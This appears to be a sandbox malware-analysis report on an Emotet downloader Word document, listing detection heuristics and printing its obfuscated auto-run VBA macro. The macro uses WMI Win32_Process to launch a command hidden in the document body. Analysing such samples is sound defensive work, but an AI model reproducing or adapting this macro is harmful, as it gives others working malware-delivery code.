MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.EmotetRed0121-9822961-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.EmotetRed0121-9822961-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set H48fzo4nx_auoj = CreateObject(Bjs5smq4b6nrho390) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13358 bytes |
SHA-256: d9f18e07b2cda0154820923aed9480db24fb8a880670170e754e5527bedb7d75 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
99 of 184 identifiers look randomly generated (e.g. 'Y1mvzksvnpv482gpkc') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Jk6cg1y99x8g2gm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Jk8h9py70_6mnlg
End Sub
Attribute VB_Name = "Ub59o72h4fy5"
Attribute VB_Name = "Oy022p1v840"
Function Jk8h9py70_6mnlg()
On Error Resume Next
V1 = F1m4shtr43l23 + Jk6cg1y99x8g2gm.Content + Wfpd5ebcy4_9
GoTo NmetZCjJp
Dim WfYIEamIE As Paragraph
Set aaZAE = FTZdtBIe
For Each WfYIEamIE In Jk6cg1y99x8g2gm.Paragraphs
Set WDyFHKA = otSYAGP
If Left(WfYIEamIE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
NmetZCjJp = WfYIEamIE.Range.ListFormat.ListString
ElseIf InStr(WfYIEamIE.Range.Text, "kkiew") > 1 Then
ZUwiI = WfYIEamIE.Range.Text
ZUwiI = Replace(saw, "sjgwb", "hqkwjbjdasd" & NmetZCjJp)
WfYIEamIE.Range.Text = ZUwiI
Set WfYIEamIE.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set XMCCFQ = axOAFCJI
Next WfYIEamIE
NmetZCjJp:
U7 = "sg yw ahpsg yw ah"
Lgrt4thwsma22dohfb = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
GoTo BpPwGEE
Dim DyBcfElm As Paragraph
Set gkwUxCUBF = jtwVxnGKZ
For Each DyBcfElm In Jk6cg1y99x8g2gm.Paragraphs
Set HpLdEF = CXbeC
If Left(DyBcfElm.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
BpPwGEE = DyBcfElm.Range.ListFormat.ListString
ElseIf InStr(DyBcfElm.Range.Text, "kkiew") > 1 Then
tZvTEABHA = DyBcfElm.Range.Text
tZvTEABHA = Replace(saw, "sjgwb", "hqkwjbjdasd" & BpPwGEE)
DyBcfElm.Range.Text = tZvTEABHA
Set DyBcfElm.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set sPrcdGGr = THYSAHH
Next DyBcfElm
BpPwGEE:
Ii3lohgsmk1yehs9 = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
GoTo KEcNAII
Dim UOXWGE As Paragraph
Set gpGSBBBP = iVguKC
For Each UOXWGE In Jk6cg1y99x8g2gm.Paragraphs
Set gyrvGs = Glxta
If Left(UOXWGE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
KEcNAII = UOXWGE.Range.ListFormat.ListString
ElseIf InStr(UOXWGE.Range.Text, "kkiew") > 1 Then
PRJvEI = UOXWGE.Range.Text
PRJvEI = Replace(saw, "sjgwb", "hqkwjbjdasd" & KEcNAII)
UOXWGE.Range.Text = PRJvEI
Set UOXWGE.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set mfrZgGNEo = KqTNJTEBA
Next UOXWGE
KEcNAII:
Ib947fn3l7axsf1_te = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
GoTo tmlZgCIE
Dim NSqgD As Paragraph
Set mXLsDB = qEEIFh
For Each NSqgD In Jk6cg1y99x8g2gm.Paragraphs
Set HeACnG = yAeAeABR
If Left(NSqgD.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
tmlZgCIE = NSqgD.Range.ListFormat.ListString
ElseIf InStr(NSqgD.Range.Text, "kkiew") > 1 Then
ZNQPCAJN = NSqgD.Range.Text
ZNQPCAJN = Replace(saw, "sjgwb", "hqkwjbjdasd" & tmlZgCIE)
NSqgD.Range.Text = ZNQPCAJN
Set NSqgD.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set HWKgC = SKOTDHDDD
Next NSqgD
tmlZgCIE:
Y4a5lo475h89hlpq = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"
GoTo hOQIGx
Dim OSRaCD As Paragraph
Set mWECHg = tTIAXJVHu
For Each OSRaCD In Jk6cg1y99x8g2gm.Paragraphs
Set NihQilXhS = bmDCt
If Left(OSRaCD.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
hOQIGx = OSRaCD.Range.ListFormat.ListString
ElseIf InStr(OSRaCD.Range.Text, "kkiew") > 1 Then
WzVRoAB = OSRaCD.Range.Text
WzVRoAB = Replace(saw, "sjgwb", "hqkwjbjdasd" & hOQIGx)
OSRaCD.Range.Text = WzVRoAB
Set OSRaCD.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set ZgKAKpX = wAkyGDnGw
Next OSRaCD
hOQIGx:
Xvl65f9z94a9yh9vn = Ib947fn3l7axsf1_te + Y4a5lo475h89hlpq + Ii3lohgsmk1yehs9 + U7 + Lgrt4thwsma22dohfb
GoTo xrCQGdE
Dim eFlhCG As Paragraph
Set DrZYnc = zfrwHItI
For Each eFlhCG In Jk6cg1y99x8g2gm.Paragraphs
Set jjTuoIz = cQooBMRJ
If Left(eFlhCG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
xrCQGdE = eFlhCG.Range.ListFormat.ListString
ElseIf InStr(eFlhCG.Range.Text, "kkiew") > 1 Then
mALHMRAC = eFlhCG.Range.Text
mALHMRAC = Replace(saw, "sjgwb", "hqkwjbjdasd" & xrCQGdE)
eFlhCG.Range.Text = mALHMRAC
Set eFlhCG.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set Qqdhc = vsvuFCIAJ
Next eFlhCG
xrCQGdE:
Bjs5smq4b6nrho390 = Ibqu7amd8y1bcmn0(Xvl65f9z94a9yh9vn)
GoTo SDgQDJGG
Dim JazBG As Paragraph
Set BWuuB = qQdSHBC
For Each JazBG In Jk6cg1y99x8g2gm.Paragraphs
Set bLbUQ = DjLCJB
If Left(JazBG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
SDgQDJGG = JazBG.Range.ListFormat.ListString
ElseIf InStr(JazBG.Range.Text, "kkiew") > 1 Then
oaninTruw = JazBG.Range.Text
oaninTruw = Replace(saw, "sjgwb", "hqkwjbjdasd" & SDgQDJGG)
JazBG.Range.Text = oaninTruw
Set JazBG.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set VmLMeoAH = FCduqjF
Next JazBG
SDgQDJGG:
Set H48fzo4nx_auoj = CreateObject(Bjs5smq4b6nrho390)
GoTo XrWLNG
Dim rVCCF As Paragraph
Set MNlvFjLC = vzJyHzBCG
For Each rVCCF In Jk6cg1y99x8g2gm.Paragraphs
Set TgasHF = uuuNH
If Left(rVCCF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
XrWLNG = rVCCF.Range.ListFormat.ListString
ElseIf InStr(rVCCF.Range.Text, "kkiew") > 1 Then
xSMkGFJ = rVCCF.Range.Text
xSMkGFJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & XrWLNG)
rVCCF.Range.Text = xSMkGFJ
Set rVCCF.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set aSMFINT = jCgcHHBBh
Next rVCCF
XrWLNG:
KK = Ibqu7amd8y1bcmn0(Mid(V1, (4), Len(V1)))
H48fzo4nx_auoj.Create KK, Mtvvb0_t9yv, Adi4sevpqmpc
GoTo pHKNGu
Dim CQaOAKBE As Paragraph
Set FrtgZEx = bsPklHBp
For Each CQaOAKBE In Jk6cg1y99x8g2gm.Paragraphs
Set zgBzZ = CgtqD
If Left(CQaOAKBE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
pHKNGu = CQaOAKBE.Range.ListFormat.ListString
ElseIf InStr(CQaOAKBE.Range.Text, "kkiew") > 1 Then
XZoQAAHFD = CQaOAKBE.Range.Text
XZoQAAHFD = Replace(saw, "sjgwb", "hqkwjbjdasd" & pHKNGu)
CQaOAKBE.Range.Text = XZoQAAHFD
Set CQaOAKBE.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set INyeIAE = AcmSCGHE
Next CQaOAKBE
pHKNGu:
End Function
Function Ibqu7amd8y1bcmn0(Be6nm7e0cjj8)
On Error Resume Next
GoTo EWqIjBICF
Dim vZfpG As Paragraph
Set CZBLDIAR = QIQgCD
For Each vZfpG In Jk6cg1y99x8g2gm.Paragraphs
Set ILumEpHCt = sDjuG
If Left(vZfpG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
EWqIjBICF = vZfpG.Range.ListFormat.ListString
ElseIf InStr(vZfpG.Range.Text, "kkiew") > 1 Then
RQvVwUiHj = vZfpG.Range.Text
RQvVwUiHj = Replace(saw, "sjgwb", "hqkwjbjdasd" & EWqIjBICF)
vZfpG.Range.Text = RQvVwUiHj
Set vZfpG.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set fPdDHGpJ = TRdJoJ
Next vZfpG
EWqIjBICF:
Q7j63miu50k = Be6nm7e0cjj8
GoTo xLkcC
Dim clWDFdR As Paragraph
Set PLTeA = hAIfEjE
For Each clWDFdR In Jk6cg1y99x8g2gm.Paragraphs
Set wjaLt = YmjijU
If Left(clWDFdR.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
xLkcC = clWDFdR.Range.ListFormat.ListString
ElseIf InStr(clWDFdR.Range.Text, "kkiew") > 1 Then
RveaGGcVC = clWDFdR.Range.Text
RveaGGcVC = Replace(saw, "sjgwb", "hqkwjbjdasd" & xLkcC)
clWDFdR.Range.Text = RveaGGcVC
Set clWDFdR.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set abRofI = YHIYWsIBu
Next clWDFdR
xLkcC:
Y1mvzksvnpv482gpkc = D5nh7u373cwnx8as_t(Q7j63miu50k)
GoTo vhMqmED
Dim ENavJC As Paragraph
Set JZNlGzJ = jWQmlwBI
For Each ENavJC In Jk6cg1y99x8g2gm.Paragraphs
Set EWeYpD = wbJSowA
If Left(ENavJC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
vhMqmED = ENavJC.Range.ListFormat.ListString
ElseIf InStr(ENavJC.Range.Text, "kkiew") > 1 Then
GmuqiuI = ENavJC.Range.Text
GmuqiuI = Replace(saw, "sjgwb", "hqkwjbjdasd" & vhMqmED)
ENavJC.Range.Text = GmuqiuI
Set ENavJC.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set PBzxJCGB = VBTHH
Next ENavJC
vhMqmED:
Ibqu7amd8y1bcmn0 = Y1mvzksvnpv482gpkc
GoTo cscEC
Dim qQdxeI As Paragraph
Set XcSrsH = AvxLVoJg
For Each qQdxeI In Jk6cg1y99x8g2gm.Paragraphs
Set wuYYJ = BCailB
If Left(qQdxeI.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
cscEC = qQdxeI.Range.ListFormat.ListString
ElseIf InStr(qQdxeI.Range.Text, "kkiew") > 1 Then
TZohEsQYJ = qQdxeI.Range.Text
TZohEsQYJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & cscEC)
qQdxeI.Range.Text = TZohEsQYJ
Set qQdxeI.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set jKwXIvDyH = GSKNCHs
Next qQdxeI
cscEC:
End Function
Function D5nh7u373cwnx8as_t(O8t__by2t7q)
GoTo ZbANDA
Dim eTdrs As Paragraph
Set EKIhH = CfdfDC
For Each eTdrs In Jk6cg1y99x8g2gm.Paragraphs
Set JZkvhBGD = affIHDIFg
If Left(eTdrs.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
ZbANDA = eTdrs.Range.ListFormat.ListString
ElseIf InStr(eTdrs.Range.Text, "kkiew") > 1 Then
uqpkMjx = eTdrs.Range.Text
uqpkMjx = Replace(saw, "sjgwb", "hqkwjbjdasd" & ZbANDA)
eTdrs.Range.Text = uqpkMjx
Set eTdrs.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set eZtbwHL = znmCFTSe
Next eTdrs
ZbANDA:
GoTo oKOEL
Dim BMVEHvF As Paragraph
Set lmtpyA = BfIKD
For Each BMVEHvF In Jk6cg1y99x8g2gm.Paragraphs
Set FUUZBckCI = mbEkAaFBl
If Left(BMVEHvF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
oKOEL = BMVEHvF.Range.ListFormat.ListString
ElseIf InStr(BMVEHvF.Range.Text, "kkiew") > 1 Then
aznobHPCs = BMVEHvF.Range.Text
aznobHPCs = Replace(saw, "sjgwb", "hqkwjbjdasd" & oKOEL)
BMVEHvF.Range.Text = aznobHPCs
Set BMVEHvF.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set pwMar = XVyJFBc
Next BMVEHvF
oKOEL:
GoTo xYsTAGJFd
Dim EWvPABiIp As Paragraph
Set bDbEUnc = uxVLt
For Each EWvPABiIp In Jk6cg1y99x8g2gm.Paragraphs
Set huzur = EywRJHC
If Left(EWvPABiIp.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
xYsTAGJFd = EWvPABiIp.Range.ListFormat.ListString
ElseIf InStr(EWvPABiIp.Range.Text, "kkiew") > 1 Then
oiyPOXUN = EWvPABiIp.Range.Text
oiyPOXUN = Replace(saw, "sjgwb", "hqkwjbjdasd" & xYsTAGJFd)
EWvPABiIp.Range.Text = oiyPOXUN
Set EWvPABiIp.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set jVGxCUFIA = dKhfCAJfB
Next EWvPABiIp
xYsTAGJFd:
D5nh7u373cwnx8as_t = Replace(O8t__by2t7q, "sg yw ah", G27kg6uz47n2x)
GoTo PRENICF
Dim IXWFCtD As Paragraph
Set WizZHIG = bcsIF
For Each IXWFCtD In Jk6cg1y99x8g2gm.Paragraphs
Set jbxuf = YrSIw
If Left(IXWFCtD.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
PRENICF = IXWFCtD.Range.ListFormat.ListString
ElseIf InStr(IXWFCtD.Range.Text, "kkiew") > 1 Then
ugMMJ = IXWFCtD.Range.Text
ugMMJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & PRENICF)
IXWFCtD.Range.Text = ugMMJ
Set IXWFCtD.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set yqTzhIxV = WwjsFItCJ
Next IXWFCtD
PRENICF:
GoTo CxajHI
Dim YmKBGFJD As Paragraph
Set XHuRw = jaczBEAF
For Each YmKBGFJD In Jk6cg1y99x8g2gm.Paragraphs
Set gYvmHBFYI = YEGREI
If Left(YmKBGFJD.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
CxajHI = YmKBGFJD.Range.ListFormat.ListString
ElseIf InStr(YmKBGFJD.Range.Text, "kkiew") > 1 Then
flJnhb = YmKBGFJD.Range.Text
flJnhb = Replace(saw, "sjgwb", "hqkwjbjdasd" & CxajHI)
YmKBGFJD.Range.Text = flJnhb
Set YmKBGFJD.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set bfogr = IRoIQ
Next YmKBGFJD
CxajHI:
GoTo fbFVfGgV
Dim pKPYJMs As Paragraph
Set NXoYa = ieJxx
For Each pKPYJMs In Jk6cg1y99x8g2gm.Paragraphs
Set ksBIG = TjvzcPEEd
If Left(pKPYJMs.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
fbFVfGgV = pKPYJMs.Range.ListFormat.ListString
ElseIf InStr(pKPYJMs.Range.Text, "kkiew") > 1 Then
GpgvGLjb = pKPYJMs.Range.Text
GpgvGLjb = Replace(saw, "sjgwb", "hqkwjbjdasd" & fbFVfGgV)
pKPYJMs.Range.Text = GpgvGLjb
Set pKPYJMs.Range.ParagraphStyle = Jk6cg1y99x8g2gm.Styles("Normal")
End If
Set sGdlBEoaC = HCJXa
Next pKPYJMs
fbFVfGgV:
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.